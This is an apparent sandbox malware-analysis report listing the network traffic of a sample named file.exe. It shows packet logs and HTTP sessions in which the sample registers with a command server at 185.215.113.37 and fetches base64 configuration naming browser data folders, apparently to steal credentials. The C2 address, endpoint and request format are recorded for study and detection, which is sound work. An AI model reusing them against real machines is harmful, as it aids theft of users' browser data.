Oct 1, 2024 19:32:16.026475906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026509047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026518106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026520014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026535988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026546001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026551962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026551962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026561022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026571035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026591063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026591063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026623964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.056344032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.061249971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275098085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275114059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275125980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275135040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275147915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275158882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275171041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275187016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275187016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275223017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275263071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275273085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275284052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275294065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275305986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275315046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275316954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275326014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275347948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275348902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275347948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275347948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275361061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275372982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275393009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275393009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275394917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275404930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275410891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275423050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275434017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275444984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275454044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275458097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275458097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275458097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275466919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275484085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275487900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275495052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275505066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275516033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275516033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275516033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275527000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275553942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275553942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275562048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275573015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275584936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275595903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275597095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275597095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275608063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275609970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275618076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275628090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275636911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275636911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275640011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275657892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275665998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275665998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275670052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275681019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275686979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275686979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275692940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275702953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275703907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275716066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275726080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275732994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275732994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275738001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275753975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275762081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275768042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275775909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275779009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275790930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275800943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275805950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275813103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275840998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275840998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275897980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275909901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275918961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275928974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275937080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275937080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275939941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275952101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275952101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275963068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275963068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275974035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.275993109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.275999069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276004076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.276017904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276027918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276038885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276048899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276057959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.276057959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.276060104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276072025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276082993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276088953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.276088953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.276094913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276102066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.276107073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276118994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.276149988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.276161909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.276843071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276855946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276865959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.276913881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.276913881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.682002068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.682023048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.877003908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.877023935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:17.590166092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:17.590783119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:17.696193933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:17.701064110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:17.915455103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:17.915472984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:17.915483952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:17.915577888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:17.915577888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:17.921426058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:18.254626036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:18.897579908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:18.972788095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:18.972846985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:18.977693081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:18.977761984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:18.979645967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:18.979695082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:18.980436087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:18.980444908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:18.981139898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:19.201478958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:19.201704025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:19.216989994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:19.222028971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:19.924213886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:19.924278021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:19.948086977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:19.952857018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:20.171152115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:20.171211004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:20.171325922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:20.171336889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:20.171365976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:20.171681881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:20.171693087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:20.171732903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:20.172173023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:20.172182083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:20.172221899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:20.173209906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:20.178136110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:21.517445087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:21.517530918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:21.517812014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:21.517853022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:21.518009901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:21.518057108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:25.891892910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:25.891953945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:26.466339111 CEST	49704	80	192.168.2.5	185.215.113.37

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 19:32:20.277009010 CEST	53	62656	1.1.1.1	192.168.2.5
Oct 1, 2024 19:32:34.589757919 CEST	53	59762	1.1.1.1	192.168.2.5

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.37	80	5424	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 19:32:02.250828028 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 19:32:02.962095976 CEST	203	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:02 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 19:32:02.965744019 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIJEBFCGDAAKFHIDBFI Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 30 30 39 44 38 45 35 41 42 38 36 33 35 37 36 38 35 30 37 39 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 49 2d 2d 0d 0a Data Ascii: ------CFIJEBFCGDAAKFHIDBFIContent-Disposition: form-data; name="hwid"3009D8E5AB863576850798------CFIJEBFCGDAAKFHIDBFIContent-Disposition: form-data; name="build"doma------CFIJEBFCGDAAKFHIDBFI--
Oct 1, 2024 19:32:03.216866016 CEST	407	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6a 63 79 4e 6a 51 34 4d 6d 59 32 4e 32 4e 6a 4e 54 4d 79 5a 44 52 6b 4e 6a 41 33 4d 44 63 32 4e 6a 49 78 5a 6a 63 34 59 57 51 34 4d 6d 55 79 4f 54 6c 69 5a 47 5a 6d 4d 47 59 34 5a 44 56 6a 4e 57 51 34 4e 6a 63 33 59 57 59 32 59 54 59 30 4d 6a 41 31 4e 44 42 6d 4d 7a 4d 77 5a 44 45 77 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: YjcyNjQ4MmY2N2NjNTMyZDRkNjA3MDc2NjIxZjc4YWQ4MmUyOTliZGZmMGY4ZDVjNWQ4Njc3YWY2YTY0MjA1NDBmMzMwZDEwfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 1, 2024 19:32:03.218501091 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJDAEGCAFIIDGDGCGIJ Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 41 45 47 43 41 46 49 49 44 47 44 47 43 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 41 45 47 43 41 46 49 49 44 47 44 47 43 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 41 45 47 43 41 46 49 49 44 47 44 47 43 47 49 4a 2d 2d 0d 0a Data Ascii: ------AKJDAEGCAFIIDGDGCGIJContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------AKJDAEGCAFIIDGDGCGIJContent-Disposition: form-data; name="message"browsers------AKJDAEGCAFIIDGDGCGIJ--
Oct 1, 2024 19:32:03.439205885 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 17:32:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 1, 2024 19:32:03.439415932 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 1, 2024 19:32:03.440473080 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBFHJDAAFBAKEBGIJKK Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 46 48 4a 44 41 41 46 42 41 4b 45 42 47 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 32 36 34 38 32 66 36 37 63 63 35 33 32 64 34 64 36 30 37 30 37 36 36 32 31 66 37 38 61 64 38 32 65 32 39 39 62 64 66 66 30 66 38 64 35 63 35 64 38 36 37 37 61 66 36 61 36 34 32 30 35 34 30 66 33 33 30 64 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 46 48 4a 44 41 41 46 42 41 4b 45 42 47 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 46 48 4a 44 41 41 46 42 41 4b 45 42 47 49 4a 4b 4b 2d 2d 0d 0a Data Ascii: ------IDBFHJDAAFBAKEBGIJKKContent-Disposition: form-data; name="token"b726482f67cc532d4d607076621f78ad82e299bdff0f8d5c5d8677af6a6420540f330d10------IDBFHJDAAFBAKEBGIJKKContent-Disposition: form-data; name="message"plugins------IDBFHJDAAFBAKEBGIJKK--
